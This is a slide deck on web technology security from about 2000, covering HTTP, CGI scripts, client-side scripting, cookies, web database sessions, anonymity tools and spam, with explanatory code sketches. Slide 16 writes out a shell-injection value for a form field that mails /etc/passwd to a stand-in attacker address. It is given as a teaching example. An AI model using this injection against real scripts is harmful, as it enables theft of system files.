World Wide Web Technology - PowerPoint PPT Presentation

Slides: 58
Provided by: PaulD109

1
World Wide Web Technology
  • Request-response paradigm

2
HTTP: HyperText Transfer Protocol
  • HTTP is a typical TCP/IP protocol.
  • Textual representation: both requests and
    responses have a textual representation so that a
    human can diagnose the protocol.
  • Standard error codes. Internet convention says:
  • 1xx: command received and being processed
  • 2xx: success
  • 3xx: further action is needed
  • 4xx: temporary error
  • 5xx: permanent error
  • (HTTP has some slight deviations, see later)

3
HTTP Example
  • HTTP 1.0 request:
  • GET /index.html HTTP/1.0
  • From: debra@win.tue.nl
  • User-Agent: Mozilla 4.74...
  • Accept: text/plain
  • Accept: text/html
  • ... other fields ...
  • <empty line marks end of request>

4
HTTP Example (cont.)
  • HTTP 1.0 reply:
  • HTTP/1.0 200 OK
  • Date: Mon, 08 Aug 2000 20:48:51 GMT
  • Server: Apache/1.3.4
  • Last-Modified: Wed, 23 Sep 1999 ...
  • Content-Length: 3173
  • Accept-Ranges: bytes
  • Connection: close
  • Content-Type: text/html
  • <empty line>
  • <The content of the document follows>
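
The request and reply shown on these two slides are plain text, which makes them easy to build and take apart by hand. The following is a minimal sketch only: the function names `build_request` and `parse_response` are made up for illustration, and no network connection is opened.

```python
def build_request(path, headers):
    """Serialize an HTTP/1.0 GET request as text."""
    lines = [f"GET {path} HTTP/1.0"]
    lines += [f"{name}: {value}" for name, value in headers]
    # The empty line (CRLF CRLF) marks the end of the request.
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_response(raw):
    """Split a raw reply into (status code, reason, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    _version, code, reason = status_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(code), reason, headers, body


request = build_request(
    "/index.html",
    [("User-Agent", "Mozilla 4.74"), ("Accept", "text/html")],
)
reply = (
    "HTTP/1.0 200 OK\r\n"
    "Server: Apache/1.3.4\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)
code, reason, headers, body = parse_response(reply)
```

Because everything is readable text, the same property that helps a human diagnose the protocol also helps an eavesdropper.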

5
HTTP Response Codes
  • 1xx: request received, processing continues.
    (Such a response is followed by another one.)
  • 2xx: success, result depends on the code
  • 200: OK, result follows.
  • 201: An entity was created as a result of the
    request.
  • 3xx: further processing needed
  • 300: Multiple choices, client must select one.
  • 301: Moved permanently. (302 is "moved
    temporarily".)
  • 304: Not modified (since date given in request).

6
HTTP Response Codes
  • 4xx: client error
  • 400: Malformed request.
  • 401: Unauthorized, authorization required.
  • 402: Payment required (not yet supported).
  • 403: Forbidden, authorization will not help.
  • 404: Not found. (Resource temporarily or
    permanently unavailable.)
  • 5xx: server error
  • 500: Internal server error (unexpected by
    server).
  • 503: Service unavailable (due to overload, ...)
  • See RFC 2068.
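
Since the first digit carries the meaning, a client can decide how to react from the class of the code alone. A small sketch, with the helper name `status_class` chosen here for illustration:

```python
STATUS_CLASSES = {
    1: "informational",  # request received, processing continues
    2: "success",
    3: "redirection",    # further processing needed
    4: "client error",
    5: "server error",
}


def status_class(code):
    """Map a three-digit HTTP status code to its class."""
    return STATUS_CLASSES.get(code // 100, "unknown")
```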

7
HTTP: Threats from result codes
  • HTTP is very susceptible to man-in-the-middle
    attacks. Examples:
  • 200: Since HTTP uses cleartext, the content of a
    document can be subtly altered. (The
    Content-Length must be kept correct though!)
  • 301: A browser can be fooled into loading from a
    different server, without the user knowing it.
  • 401: A user can be tricked into giving away their
    password. Basic authentication transmits the
    password without encryption. (The newer digest
    authentication sends a cryptographic digest of
    the password instead of the password itself.)
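
To see why basic authentication offers no protection against an eavesdropper, note that the credentials are only base64-encoded, which anyone can reverse. A short sketch (the user name, password and function names are made up):

```python
import base64


def basic_auth_header(user, password):
    """Value of the Authorization header for basic authentication."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8"))
    return "Basic " + token.decode("ascii")


def eavesdrop(header_value):
    """Recover user name and password from a captured header value."""
    _scheme, token = header_value.split(" ", 1)
    decoded = base64.b64decode(token).decode("utf-8")
    user, _, password = decoded.partition(":")
    return user, password


captured = basic_auth_header("alice", "secret")
```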

8
HTTP Basics
  • HTTP/1.0 uses a TCP/IP connection for each
    request.
  • HTTP/1.0 wastes resources because opening and
    closing connections is expensive.
  • Subsequent requests to the same server seem to
    form a session, but because they are separate
    TCP/IP connections the (non-existent) session can
    easily be broken into.
  • Browsers (Netscape Navigator, Internet Explorer,
    ...) issue several requests in parallel to
    retrieve in-line images faster. For a busy server
    this can have the same effect as a denial of
    service attack.

9
HTTP Basics
  • HTTP/1.1 solves some 1.0 problems:
  • Support for multi-part content, meaning that only
    one request is needed to retrieve several objects
    at once.
  • Persistent connections reduce the risk of
    break-ins into a session, and reduce connection
    setup overhead. (Persistent connections may also
    cause a server to need many more open
    connections.)
  • Authentication can be done through a challenge
    mechanism and digest authentication, so that the
    user's password itself is not transmitted over
    the network.
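
The challenge mechanism can be sketched as follows. The server sends a one-time value (nonce); the client answers with an MD5 digest computed over the password and that nonce. This follows the original digest scheme without the later "qop" extension, as far as it can be reproduced here; the function names and sample values are assumptions for illustration.

```python
import hashlib


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(user, realm, password, method, uri, nonce):
    """Digest sent by the client instead of the password."""
    ha1 = md5_hex(f"{user}:{realm}:{password}")  # secret part
    ha2 = md5_hex(f"{method}:{uri}")             # what is being requested
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


first = digest_response("alice", "db", "secret", "GET", "/index.html", "nonce-1")
second = digest_response("alice", "db", "secret", "GET", "/index.html", "nonce-2")
```

A fresh nonce yields a different digest, so a captured reply cannot simply be replayed for a later challenge. Note that this is hashing, not encryption: the document itself still travels in cleartext.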

10
HTTP Security Issues
  • HTTP allows content-coding. Unfortunately, only
    compression schemes are defined, and no
    encryption schemes.
  • Secure-HTTP (or S-HTTP) is an extension with
    encryption, but not well supported. It encrypts
    the message (and reply) body but some of the
    header info is not encrypted.
  • HTTPS (HTTP over SSL) first creates an encrypted
    channel (using SSL). Subsequently request and
    reply headers and body are encrypted.

11
HTTP Security Issues (cont.)
  • Experimental implementations of persistent
    connections in HTTP 1.0 cause denial of service.
    Therefore HTTP 1.1 proxy servers never open a
    persistent connection with an HTTP 1.0 client.
  • HTTP 1.1 connections may time out. Both clients
    and servers must always be able to recover from
    asynchronous close events.
  • Browsers can route requests through a proxy. Some
    Internet providers use a transparent proxy: the
    user may not be aware of the proxy's existence.

12
HTTP Security Issues (cont.)
  • Safe methods: GET and HEAD should not take an
    action other than retrieval. (Users cannot be
    held accountable for side effects of these
    methods.)
  • Forms which are used with the GET method should
    never ask for sensitive information, because of
    logging attacks.
  • The Content-MD5 header can be used to add a
    digest (checksum) to a reply. This gives the
    false impression that the message has not been
    tampered with: an attacker who alters the body
    can simply recompute the digest.
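
The weakness of Content-MD5 is easy to demonstrate: the header value is the base64-encoded MD5 digest of the body, and no secret is involved. A sketch with made-up message bodies and helper names:

```python
import base64
import hashlib


def content_md5(body):
    """Content-MD5 header value for a message body (bytes)."""
    return base64.b64encode(hashlib.md5(body).digest()).decode("ascii")


def verify(body, header_value):
    return content_md5(body) == header_value


original = b"Pay 10 euro to Alice"
tampered = b"Pay 99 euro to Mallory"
original_header = content_md5(original)
forged_header = content_md5(tampered)  # the attacker recomputes the digest
```

The check catches accidental corruption (`verify(tampered, original_header)` fails) but not a deliberate change that also replaces the header.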

13
HTTP Security Issues (cont.)
  • The behavior of a cache with authorized requests
    is not always safe: a cache may return replies to
    non-authenticated clients.
  • Sharing browser sessions on shared workstations
    poses the risk that authorized sessions are taken
    over by the next user.
  • A server may attempt to validate the identity of
    the user through the RFC 931 protocol. The
    user's machine confirms the user name of an open
    connection. This technique is generally unsafe.

14
Server-side Technology
  • Basic architecture: CGI scripts act as a gateway
    between WWW server and information system
    (database system).

15
Server-side Technology
  • Security threats from CGI-scripts:
  • The input for a CGI-script results from filling
    out a form. The script should anticipate
    erroneous input, possibly also data overrun.
  • A CGI-script should check that it is invoked
    through the right form, by checking the
    HTTP_REFERER field. However, this field can be
    faked.
  • CGI-scripts are often written in scripting
    languages such as Perl or Bourne-shell. Writing
    scripts in such languages is easy, but writing
    secure scripts is difficult.

16
Server-side Technology
  • Example: (part of) an insecure shell script
  • echo $message | sendmail $mail_to
  • ($message and $mail_to are form fields)
  • If the user enters into the mail_to field:
  • nobody@nowhere.com; mail badguys@hell.org </etc/passwd
  • this results in the password file being sent to
    badguys@hell.org.
  • Moral: do not use environment variables (that
    are set through forms) without quoting and
    without checking them.
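
One way to follow this moral is to check the form field against a strict pattern and to pass it to the mail program as a separate argument, so that no shell ever interprets it. The sketch below is an illustration under assumptions: the pattern is deliberately conservative (it rejects some valid addresses), and the helper names are invented.

```python
import re

# Conservative pattern: must start with a letter or digit, so the
# value can never be mistaken for a command-line option.
ADDRESS_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"
)


def is_valid_recipient(mail_to):
    return ADDRESS_RE.fullmatch(mail_to) is not None


def build_mail_command(mail_to):
    """Return an argument list; the recipient is one argument, not shell text."""
    if not is_valid_recipient(mail_to):
        raise ValueError("rejected recipient")
    return ["sendmail", mail_to]

# The list would be handed to subprocess.run(argv, input=message, text=True),
# which starts the program directly without involving a shell.
```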

17
Server-side Technology
  • CGI-scripts can also be abused for denial of
    service attacks:
  • An HTTP POST (or PUT) request can contain an
    arbitrary amount of input data. This may cause
    several problems:
  • Intermediate proxies may crash.
  • The CGI-script may crash.
  • The CGI-script may need a lot of memory to handle
    the request.
  • A Web-server can be bombarded with (small)
    requests for CGI-scripts. The overhead can
    easily overload the Web-server.
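
A script can defend itself against oversized input by refusing to read more than a fixed number of bytes. A minimal sketch, assuming the declared length comes from the Content-Length header; the limit of 64 KB and the function name `read_body` are arbitrary choices for illustration.

```python
import io

MAX_BODY_BYTES = 64 * 1024  # assumed limit, tune per application


def read_body(stream, declared_length, limit=MAX_BODY_BYTES):
    """Read a request body, refusing anything larger than the limit."""
    if declared_length < 0 or declared_length > limit:
        raise ValueError("request body too large")
    data = stream.read(declared_length)
    if len(data) != declared_length:
        raise ValueError("truncated request body")
    return data


form_data = read_body(io.BytesIO(b"a=1&b=2"), 7)
```

This bounds memory use per request; it does not help against a flood of many small requests, which has to be handled by the server or the network.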

18
Server-side Technology
  • Netscape: NSAPI
  • In the handling of a request, code can be added to
    the server in different places: Init, AuthTrans,
    NameTrans, PathCheck, ObjectType, Service, Error
    and AddLog.
  • Errors in the user-added functions may cause the
    server to crash.
  • http://developer.netscape.com/docs/manuals/enterprise/nsapi/index.htm
  • Netscape: WAI (Web Application Interface)
  • Newer API to write application wrappers, again
    through a server plug-in.

19
Server-side Technology
  • Microsoft IIS: ISAPI
  • Similar to NSAPI, with the same problem: code
    added to the server may cause the server to
    crash.
  • Microsoft IIS: ASP (Active Server Pages)
  • Server-side scripting, in VBscript or Jscript, to
    create dynamic Web content and connections with
    databases. (Uses an ISAPI plugin itself.)
  • Microsoft IIS: IDC (Internet Database Connector)
  • Extended HTML written in .htx files
  • Database scripts written in .idc files (easy to
    create through Frontpage editor)

20
Server-side Technology
  • Servlets: Java equivalent to NSAPI or ISAPI
  • User-written code is added to the (running)
    server.
  • The Java environment ensures that errors in the
    code cannot cause a server crash.
  • The servlet API includes facilities for
    maintaining session information.
  • Servlets are a server-independent technology.
    Many Web-servers support Java servlets.

21
Client-side Technology
  • Apart from displaying HTML pages, a modern
    Web-browser can perform many other tasks:
  • Invoking external programs
  • User-interaction through forms
  • Preserving state using cookies
  • Executing scripting code
  • Extension of browser with plug-ins
  • Execution of Java applets (plain or signed)
  • Execution of ActiveX controls (Windows only).

22
Client-side Technology
  • Invoking external programs:
  • The HTTP reply contains a MIME-type. Depending on
    the MIME-type the browser will:
  • Display the information (e.g. for HTML, GIF,
    JPG).
  • Use a plug-in to handle the information (see
    later).
  • Invoke an external program to handle the
    information.
  • The external program must already be installed on
    the client machine.
  • The user defines which MIME-type corresponds to
    which program.
  • The user must be careful to not allow information
    to be stolen or overwritten (un)intentionally.

23
Client-side Technology
  • User-interaction through forms:
  • Many Web-sites offer seemingly interesting
    information only after the user fills out a form,
    which sends potentially sensitive information
    about the user to the Web-site.
  • Form input is sent to the server as cleartext.
    The browser can warn the user about it, but most
    users disable the warnings.
  • Modern browsers support form-based file upload.
    Users can be tricked into uploading files with
    sensitive data.
  • Beware of forms combined with scripting.

24
Client-side Technology
  • Preserving state info through Cookies:
  • A server orders a browser to store info using a
    Set-Cookie field in an HTTP reply. (One reply may
    contain several Set-Cookie requests.)
  • The browser returns cookies using the Cookie
    field in an HTTP request.
  • Cookies (with valid associated path names) are
    shared between servers that share part of the
    domain name: 2 periods for .com, .edu, etc. and 3
    periods for .us, .nl, .uk, .be, etc.
  • Cookies are limited to 4 Kbyte each, 20 Cookies
    per domain, 300 Cookies total.
  • http://www.netscape.com/newsref/std/cookie_spec.html
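
The "number of periods" rule for sharing cookies between servers can be written down as a small check. This is a sketch of the rule as stated on the slide, not of any browser's actual code; the set of top-level domains that need only two periods is taken, as far as recalled, from the Netscape specification, and the function name is invented.

```python
# Top-level domains for which two periods suffice (assumed from the spec).
SPECIAL_TLDS = {"com", "edu", "net", "org", "gov", "mil", "int"}


def cookie_domain_ok(host, cookie_domain):
    """True if a cookie with this domain attribute may be sent to host."""
    domain = cookie_domain.lower()
    tld = domain.rsplit(".", 1)[-1]
    required_periods = 2 if tld in SPECIAL_TLDS else 3
    # Tail matching: the host name must end with the cookie domain.
    return domain.count(".") >= required_periods and host.lower().endswith(domain)
```

For example, `.acme.com` is acceptable for `shop.acme.com`, while `.tue.nl` is too short under the three-period rule and `.win.tue.nl` is needed instead.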

25
Client-side Technology
  • Javascript and VBscript
  • Scripting languages (Javascript from Netscape and
    VBscript from Microsoft) make Web-pages active
    and/or interactive.
  • Actions can be triggered by user input (like
    button clicks, filling out a text field, etc.),
    by window operations (like close) and by
    time-outs.
  • Scripting languages can be abused to:
  • Render the user's workstation useless.
  • Lure the user into typing in or uploading
    sensitive information.
  • Lure users to the wrong Web-sites.

26
Client-side Technology
  • Denial of service attacks using scripting:
  • Scripting languages are interpreted, which means
    execution is slow. A long (or infinite) loop may
    consume a large percentage of the available
    cpu-time.
  • A simple script may loop through a large array,
    thus consuming a lot of memory and hence
    resulting in thrashing.
  • A script may create extra windows upon being
    (un)loaded. It may re-open the window each time
    it is minimized or closed. A script may make it
    very difficult to get rid of such a window.

27
Client-side Technology
  • Obtaining sensitive information through scripts
  • There are numerous ways to lure users into typing
    in what one wants them to type using forms alone.
  • Scripting adds the possibility to open a popup
    window prompting for information.
  • A script can also make suggestions in the message
    area (bottom of browser window).
  • A script can change a file upload field before
    doing the upload.

28
Client-side Technology
  • Danger of a powerful scripting language:
    unrestricted simultaneous access to local
    resources and the network.
  • A (VB)script can read, write, create and delete
    arbitrary files (for which the user has access
    rights).
  • A script can perform complicated calculations and
    manipulations because it is a general-purpose
    programming language.
  • The mail-part of Internet Explorer can be
    configured to automatically invoke scripts
    without requiring a click.

29
Client-side Technology
  • Tricking the clicks
  • A browser normally displays the destination of a
    link in the message area. A script can write a
    message by handling the mouseover event. This
    message may suggest a different link destination.
  • Some sites are paid for through advertisements.
    Some advertisers want to see hits on their site.
    Scripts can be used to simulate (but really
    generate) hits to sites without the user actually
    clicking on anything.

30
Client-side Technology
  • Extending the browser with plug-ins
  • Plug-ins are modules in machine code that are
    intended for enabling a browser to display some
    media type in-line.
  • A plug-in must be installed by the user on the
    client machine. Users should be very suspicious
    about plug-ins, but most users are not.
  • A plug-in can perform all operations a separate
    executable can, including uploading arbitrary
    files, installing viruses, modifying or deleting
    arbitrary files, crashing the browser, maybe even
    rebooting the operating system, etc.

31
Client-side Technology
  • Java applets: safe interactive components? Java
    applets are executed within a shielded
    environment (called the sandbox):
  • Applets cannot read or write files.
  • Applets can only open IP connections to their
    origin site.
  • The Java runtime environment can perform a
    limited integrity check on applets.
  • When an applet performs an illegal operation, the
    Java runtime environment catches it and generates
    an appropriate error message.

32
Client-side Technology
  • Java applets: safe interactive components?
  • Applets can call methods of other applets that
    are included in the same HTML file. (They cannot
    find out about applets in other files.)
  • Applets in different frames (or files) can
    communicate through static fields.
  • Applets are stopped when the enclosing Web-page
    is being unloaded (replaced by a new page).
  • Stopped applets (not on displayed pages) may be
    destroyed and garbage collected.
  • Resource consumption by active applets may render
    the user's workstation unusable.

33
Client-side Technology
  • ActiveX: Distributed Components
  • ActiveX uses code signing. The supplier of an
    ActiveX control must provide a certificate
    (obtained from a trusted third party).
  • The browser displays an Authenticode dialog box
    asking the user to accept the ActiveX control.
  • An accepted ActiveX control is a machine code
    module downloaded from a remote site. It can
    perform all actions that a separate program can
    execute (uploading, crashing, formatting hard
    disk, etc.)
  • See also http://www.byte.com/art/9709/sec5/sec5.htm

34
Database Sessions on the Web
  • Database transactions consist of several steps.
    When accessing a database through the Web each
    step takes a separate HTTP request.
  • The requests need to be tied to the appropriate
    session (or transaction).
  • The session must not be broken into (even though
    each request is separate).
  • The system needs to be able to handle long-lived
    transactions but also be able to timeout when a
    session is inactive for a long time.

35
Database Sessions on the Web
  • Logging on to a Database through WWW:
  • Logging on can be done through a form that
    asks for a username and password. The
    password will not be encrypted in the request.
  • The server can return a code 401 on the first
    database request. The browser will prompt for a
    username and password. With basic authentication
    the password will not be encrypted. With digest
    authentication only a digest of it is sent.
  • The browser will authenticate each subsequent
    request. The user must make sure to exit the
    browser after completing the database session.

36
Database Sessions on the Web
  • Once a session is created the browser must be
    able to refer to it in each request.
  • The session id can be kept in a hidden field in
    the form on each page.
  • The session id can be passed as part of the URL
    of each page.
  • The session id can be passed through Cookies.
    (Cookies are set through an HTTP reply and are
    stored on the client computer. They are sent
    back by the client on each subsequent request.)
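
Whichever of the three carriers is used, the session id must be hard to guess (otherwise the session can be broken into) and must expire after a period of inactivity. A minimal server-side sketch; the class name `SessionStore` and the 15-minute timeout are assumptions for illustration.

```python
import secrets
import time

SESSION_TIMEOUT = 15 * 60  # seconds of inactivity, assumed value


class SessionStore:
    def __init__(self, timeout=SESSION_TIMEOUT, clock=time.monotonic):
        self._timeout = timeout
        self._clock = clock
        self._last_seen = {}

    def create(self):
        """Start a session and return its unguessable id."""
        session_id = secrets.token_urlsafe(32)
        self._last_seen[session_id] = self._clock()
        return session_id

    def touch(self, session_id):
        """Validate the id sent with a request; refresh it if still alive."""
        now = self._clock()
        last = self._last_seen.get(session_id)
        if last is None or now - last > self._timeout:
            self._last_seen.pop(session_id, None)  # unknown or expired
            return False
        self._last_seen[session_id] = now
        return True
```

The id returned by `create()` is what goes into the hidden field, the URL or the cookie; each later request calls `touch()` before any database work is done.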

37
Database Sessions on the Web
  • Dealing with long-lived transactions:
  • When most transactions wish to succeed (e.g.
    customers want to buy items) one should use
    pessimistic concurrency control. Items are
    locked while they are in the customer's shopping
    cart.
  • When most transactions are deliberately aborted
    (e.g. customers put back items or leave the
    store, leaving their cart behind) one should use
    optimistic concurrency control. Items are not
    locked while in the customer's shopping cart and
    may not be available at the cash register.
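
The difference between the two strategies shows up at two moments: when an item goes into the cart and when the customer pays. The following in-memory sketch illustrates this under simplifying assumptions (one process, no real database); all names are hypothetical.

```python
class Inventory:
    def __init__(self, stock):
        self.stock = dict(stock)   # items physically available
        self.reserved = {}         # items locked in shopping carts

    # Pessimistic: the item is locked as soon as it enters a cart.
    def add_to_cart_locked(self, item):
        free = self.stock.get(item, 0) - self.reserved.get(item, 0)
        if free <= 0:
            return False           # another cart already holds it
        self.reserved[item] = self.reserved.get(item, 0) + 1
        return True

    def checkout_locked(self, item):
        self.reserved[item] -= 1
        self.stock[item] -= 1

    # Optimistic: carts hold nothing; availability is checked when paying.
    def checkout_optimistic(self, item):
        if self.stock.get(item, 0) <= 0:
            return False           # sold while it sat in the cart
        self.stock[item] -= 1
        return True
```

With pessimistic control the second customer is refused early; with optimistic control both customers can fill their carts and the disappointment comes at the cash register.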

38
Database Connections through Java
  • Java applets can be used to keep a connection to
    a database (or gateway) open.
  • JDBC-ODBC bridge: works with many database
    systems.
  • Native-API partly-Java driver: requires a specific
    client API (for Oracle, Sybase, ...)
  • Net-protocol All-Java driver: the protocol between
    browser and server is vendor independent.
  • Native-protocol All-Java driver: converts JDBC
    calls to the network protocol of a specific DBMS.
    There are 2-tier and 3-tier configurations.

39
Database Connections through Java
  • JDBC-ODBC bridge

40
Database Connections through Java
  • Native-API Partly-Java driver

41
Database Connections through Java
  • Net-protocol All-Java driver

42
Database Connections through Java
  • Native-Protocol All-Java driver, 2-tier

43
Database Connections through Java
  • Native-Protocol All-Java driver, 3-tier

44
Database Connections through Java
  • Native-Protocol All-Java driver, 3-tier

45
Privacy on the Web
  • The Web is not as anonymous as it looks:
  • The user's IP address, browser, operating system
    and other aspects may be detected. Cookies may
    provide additional information about the user.
  • Different Web-sites may collaborate in gathering
    data about users by combining their logging
    activities.
  • ISPs may log Web access distribution and provide
    access patterns and hit rates to Web-sites.
  • Users may sometimes want to be known (e.g. to buy
    and pay something) and sometimes want to be
    anonymous.

46
Privacy on the Web
  • The Anonymizer:
  • Functions as a kind of proxy server.
  • Accesses appear to originate from the anonymizer
    site instead of the user's IP address.
  • All user-related data is removed from a request.
  • Users are not anonymous to the anonymizer. (And
    the anonymizer may be legally forced to reveal a
    user's accesses.)
  • Users are not anonymous to their ISP either.
  • See http://www.anonymizer.com/

47
Privacy on the Web
  • Crowds: anonymously hiding in a crowd.
  • Each user activates a "jondo"; jondos communicate
    with each other.
  • Each HTTP request is forwarded to another
    randomly chosen jondo.
  • Each received request is either forwarded to
    another jondo or passed onto the destination
    server.
  • The random routing is very safe (not traceable,
    and no single point of failure) but may be slow.
  • Crowds cannot really include members that are
    behind firewalls.
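
The forwarding rule of Crowds can be simulated in a few lines. This is a sketch only: the forwarding probability `p_forward` and the function name are assumptions, since the slide gives no numbers.

```python
import random


def crowd_path(jondos, p_forward=0.75, rng=random):
    """Return the list of jondos a request passes before reaching the server."""
    path = [rng.choice(jondos)]          # first hop: a randomly chosen jondo
    while rng.random() < p_forward:      # forward again ...
        path.append(rng.choice(jondos))
    return path                          # ... or pass on to the destination


example = crowd_path(["a", "b", "c", "d"], rng=random.Random(1))
```

The server only sees the last jondo on the path, and no jondo can tell whether its predecessor was the originator or just another forwarder. Longer paths explain why the scheme may be slow.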

48
Privacy on the Web
  • Onion Routing: anonymity through encrypted
    messages and routing through a network of
    Mixes.
  • An onion (on the client machine) determines a
    path through the network. It uses a recursively
    layered data structure using keys of all routers
    on the path.
  • Each router can decrypt the onion to find out the
    address of the next router (but not the message
    or the rest of the path).
  • There is no single point of failure.
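
The recursively layered structure can be illustrated with a toy example. Important assumptions: the "cipher" below is a simple XOR with a hash-derived keystream and is NOT secure, real onion routing uses public-key cryptography, and all names and keys are invented for illustration.

```python
import hashlib
import json


def keystream_xor(key, data):
    """Toy cipher (insecure): XOR data with a SHA-256 based keystream."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def build_onion(path, keys, message):
    """Wrap the message in one layer per router, innermost layer first."""
    payload = message.encode("utf-8")
    next_hop = "destination"
    for router in reversed(path):
        layer = json.dumps({"next": next_hop, "payload": payload.hex()})
        payload = keystream_xor(keys[router], layer.encode("utf-8"))
        next_hop = router
    return payload


def peel(router_key, onion):
    """A router removes its own layer: it learns the next hop only."""
    layer = json.loads(keystream_xor(router_key, onion).decode("utf-8"))
    return layer["next"], bytes.fromhex(layer["payload"])


keys = {"r1": b"key-one", "r2": b"key-two", "r3": b"key-three"}
onion = build_onion(["r1", "r2", "r3"], keys, "GET /index.html")
```

Each router that peels its layer sees the next hop and an opaque blob; in this toy version only the last router on the path recovers the original request.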

49
Privacy on the Web
  • LPWA: Lucent Personalized Web Assistant
  • Acts as a proxy server.
  • Creates a different alias for a user for each
    Web-site. (So collaborating Web-sites cannot
    detect a common user.)
  • Creates a different fake (but also real) email
    address.
  • Includes anti-spamming support by allowing the
    user to block certain fake email addresses (to
    which spam is being sent).
  • Has a single point of failure.

50
Anonymous E-mail (or Netnews)
  • Pseudo-anonymous remailers:
  • The user registers with a remailer. The remailer
    creates an alias (email address on its site).
    Mail from the user is forwarded as if it came
    from the alias. Mail to the alias is forwarded
    back to the user.
  • Mail is delayed for a random period of time, so
    that there is no correlation between the time
    mail arrives at the remailer and the time it
    leaves the remailer.
  • A trustworthy remailer will support PGP.

51
Anonymous E-mail (or Netnews)
  • True anonymous remailers:
  • Cypherpunk remailers:
  • Messages are encrypted recursively several times.
  • Each remailer strips off one layer.
  • Mixmaster remailers:
  • Messages contain 20 encrypted headers.
  • Each remailer adds its header to the back of the
    list, so the number of headers remains 20. (No
    remailer knows how many hops there are before or
    after itself, except for the last one, which
    knows it must perform delivery.)
  • Nice intro to Cypherpunk and Mixmaster at
  • http://www.obscura.com/loki/remailer/remailer-essay.html

52
SPAM
  • SPAM is a collection of forms of email abuse,
    including:
  • Trying to sell you something you don't want.
  • Pyramid scams.
  • Chain letters.
  • Junk mail faked to look like it accidentally got
    to you but was for someone else.
  • Requests for permission to send you commercial
    email.
  • Unwanted announcements of events.

53
SPAM
  • How to recognize SPAM?
  • Subject or content often speaks for itself.
  • Sender is a numbered/free email account.
  • Message asks to reply if you wish to no longer
    receive mail from this sender or list.
  • Sender looks like a fake address.
  • Sender looks like a real address but clearly an
    address from where this kind of message would not
    have been sent.

54
SPAM
  • Why do you receive SPAM?
  • There are "robots" or "spiders" searching for
    email addresses on Web-sites, Netnews postings,
    mailing list archives, message boards.
  • Organizations sell databases with millions of
    email addresses they gathered. (They use SPAM to
    advertise their databases)
  • If you have never announced your email address
    anywhere, someone else may have done it, e.g. to
    tell people in a newsgroup that you are
    knowledgeable in some subject area.

55
SPAM
  • How to avoid SPAM?
  • The chances to completely avoid SPAM are small
    when you use the Web, Netnews, etc.
  • Never write your email address.
  • Transform your email address in a way which is
    obvious enough for humans but too difficult for
    mail-address-searching robots (e.g. use
    NOyournameSPAM@NOTmysite.myorg.com).
  • Do not explain how to obtain your email address
    from the distorted one.
  • Never reply to a SPAM message!

56
SPAM
  • How to filter out SPAM?
  • Block mail from sites which are known for
    spamming (some free email sites are often
    blocked, including hotmail.com, freemail.nl).
  • Block mail from usernames with numbers in them.
  • Delete mail with a combination of certain words
    or expressions in them (like "get rich" or "make
    ... in ... days").
  • Verify that the sender's domain exists.
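
The first three filter rules can be combined into one small function. This is a sketch under assumptions: the blocked domains are the two named on the slide, the phrase list is a made-up sample, and the domain-existence check is left out because it needs a DNS lookup.

```python
import re

BLOCKED_DOMAINS = {"hotmail.com", "freemail.nl"}  # examples from the slide
SUSPICIOUS_PHRASES = ("get rich",)                # sample list, extend as needed


def looks_like_spam(sender, body):
    """Apply the simple heuristics: blocked site, digits in name, phrases."""
    user, _, domain = sender.lower().partition("@")
    if domain in BLOCKED_DOMAINS:
        return True
    if re.search(r"\d", user):
        return True
    text = body.lower()
    return any(phrase in text for phrase in SUSPICIOUS_PHRASES)
```

Rules this crude also reject legitimate mail (many real users have digits in their address), so in practice they are better used to flag messages than to delete them.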

57
SPAM
  • What to do and what not to do:
  • Do not send an email bomb to the sender, because
    in 99% of the cases the sender address was faked.
  • Send a friendly message to the "postmaster" or
    "abuse" address of the sender's site, to warn
    them that the site's name is being abused. (Do
    not assume the site is the origin of the SPAM.)
  • Notify your ISP, who may try to trace back the
    real origin of the message.
  • If the message announces dubious services with
    phone numbers, notify the phone company.